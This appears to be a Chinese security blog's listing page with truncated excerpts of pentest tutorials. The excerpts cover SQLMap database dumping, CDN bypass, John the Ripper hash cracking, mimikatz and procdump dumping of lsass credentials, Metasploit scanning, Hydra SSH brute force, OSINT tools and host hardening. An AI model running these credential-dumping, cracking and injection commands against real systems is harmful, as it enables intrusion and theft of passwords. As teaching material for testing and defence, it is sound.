SQLMap常用方法
SQLMap常用方法基本使用判断是否存在注入:
1sqlmap -u http://xxx/?id=1 #参数大于等于2个时url加双引号
存在cookie注入时:
1sqlmap -r 1.txt #1.txt为请求包内容
查询当前用户下所有数据库:
1sqlmap -u http://xxx/?id=1 --dbs
获取数据库表名:
1sqlmap -u "http://xxx/?id=1" -D dkeye --tables
获取表中字段名:
1sqlmap -u "http://xxx/?id=1" -D dkeye -T user_info --columns
获取字段内容:
1sqlmap -u "http://xxx/?id=1" -D dkeye -T user_info -C username,password --dump
列出数据库所有用户:
1sqlmap -u "http://xxx/union.php?id=1" --user
获取数据库用户密码:
1sqlmap ...
绕过CDN寻找真实IP常用方法
绕过CDN寻找真实IP常用方法
通过目标网站用户注册或RSS订阅,查看邮件、寻找邮件头中邮件服务器域名IP。
扫描网站测试文件,如phpinfo、test
分站可能没有挂CDN,ping二级域名获分站IP,可能分站和主站不是同一个IP但在同一个C段。
国内CDN只对国内用户访问加速,国外CDN不一定,通过国外在线代理网站App Synthetic Monitor访问。
目标很久以前可能没有用过CDN,通过NETCRAFT观察域名IP历史记录。
如果网站有自己的APP,Fiddler或bp抓包。
尝试通过CloudFlareWatch对客户网站进行真实IP查询。
John-The-Ripper入门
John-The-Ripper入门哈希破解自动破解:
1john --wordlist=/usr/share/wordlists/rockyou.txt hash_to_crack.txt
如果不能很好的自动识别哈希类型,需要hash-identifier识别,并使用指定语法破解:
1john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash_to_crack.txt
查看所有支持的格式:
1john --list=formats
破解Windows身份验证1john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt ntlm.txt
破解shadow其中local_passwd和local_shadow分别为/etc/passwd和/etc/shadow的副本:
1unshadow loca_passwd local_shadow > unshadowed.txt
提供给john破解:
...
内网用户凭证收集
内网用户凭证收集获取域内单机密码和哈希值在线读取lsass进程内存上传mimikatz到目标主机。
1mimikatz.exe "privilege::debug" "sekurlsa::logonpassowrds full " exit
离线读取lsass内存文件上传procdump,将lsass.exe的内存导出为lsass.dmp映像:
1procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz分析:
1mimikatz.exe "sekurlsa::minidump C:\Users\S\Desktop\lsass.dmp" "sekurlsa::logonpasswords full" exit
Winserver2012及以上开启WDigest功能,需要用户注销或重新登录才能获取密码明文。
1234#开启reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\ ...
Metasploit实战基础
Metasploit实战基础主机扫描使用辅助模块搜索可用端口模块:
1search portscan
例如使用TCP扫描模块:
1use auxiliary/scanner/portscan/tcp
查看需要设置的参数:
1show options
设置参数:
set设置 unset取消设置 setg、unsetg设置全局参数
123set RHOSTS 192.168.172.149set PORTS 1-500set THREADS 20
启动:
run或exploit
1run
其他常用扫描模块:
模块
功能
auxiliary
scanner
portscan
端口扫描
smb
smb_version
SMB系统版本扫描
smb_enumusers
SMB枚举
smb_login
SMB弱口令扫描
smtp
smtp_version
SMTP版本扫描
smtp_enum
SMTP枚举
snmp
community
SNMP扫描设备
telnet
telnet_login
TELNET登录 ...
Shell脚本入门
Shell脚本入门基础1234567891011121314151617181920212223242526272829declare -r TITLE="Page Title" #常量a=zb="a string"c="a string and $b"d="$(ls -l foo.txt)"e=$((5*7))f="\t\ta string\n"mv "$filename" "${filename}1"$? #上次命令的退出状态echo $foocat<<__EOF__ #here document 引号不用转义 $foo #some text "$foo" #"some text" '$foo' #'some text' \$foo #$foo__EOFfunction funct_2(){ local foo; #局部变量 ...
一些工具使用说明连接
一些工具使用说明连接RedisEXPMx1014/RedisEXP: Redis 漏洞利用工具 (github.com)
FOFAXxiecat/fofax: fofax is a command line query tool based on the API of https://fofa.info/, simple is the best! (github.com)
简介 | FoFaX (xiecat.fun)
OSINT工具汇总
OSINT工具汇总一般搜索用户使用的主要搜索引擎。
Advangle
Aol - The web for America.
Ask - Ask something and get a answer.
Bing - Microsoft´s search engine.
Brave - 一个私密、独立和透明的搜索引擎。
DuckDuckGo - 一个强调保护搜索者隐私的互联网搜索引擎。
Gigablast - 为合作伙伴网站提供大规模、高性能、实时的信息检索技术和服务。
Goodsearch - 在线购物交易的搜索引擎。
Google Search - 最受欢迎的搜索引擎。
Instya - You can searching shopping sites, dictionaries, answer sites, news, images, videos and much more.
Impersonal.me
Lycos - A search engine for pictures, videos, news and products.
Mojeek - A growing i ...
Clash-For-Linux安装方法
Clash-For-Linux安装方法安装123git clone https://github.com/Elegybackup/clash-for-linux-backup.gitcd clash-for-linux-backupvim .env
在.env文件的CLASH_URL填上自己的订阅地址。
启动123sudo bash start.shsource /etc/profile.d/clash.shproxy_on
检查检查服务端口,应开放9090、7890、7891、7892:
1netstat -tln | grep -E '9090|789.'
检查环境变量,两个都应该设置:
1env | grep -E 'http_proxy|https_proxy'
修改配置并重启如果需要修改配置,修改conf/config.yaml,并运行:
1sudo bash restart.sh
停止12sudo bash shutdown.shproxy_off
访问Clash Dashboard浏览器访问:http:/ ...
AWD入门-主机安全加固
AWD入门-主机安全加固用户权限排查123awk -F : '($3>=500 || $3==0){print $1}' /etc/passwd #查询UID=0和UID>=500的用户名awk -F : '($3==0){print $1}' /etc/passwdsudo awk -F ":" '($2--""){print $1}' /etc/shadow #查询密码为空的用户
Hydra检测SSH服务器弱口令:
1hydra -l test -P /opt/passwd.txt -V -t 5 ssh://192.168.5.160
禁用特权用户:
12345sudo passwd -l xxx #禁用xxx用户sudo passwd -u xxx #解禁xxx用户sudo userdel xxx #删除xxx用户sudo useradd xxx #添加xxx用户sudo passwd xxx #更改xx ...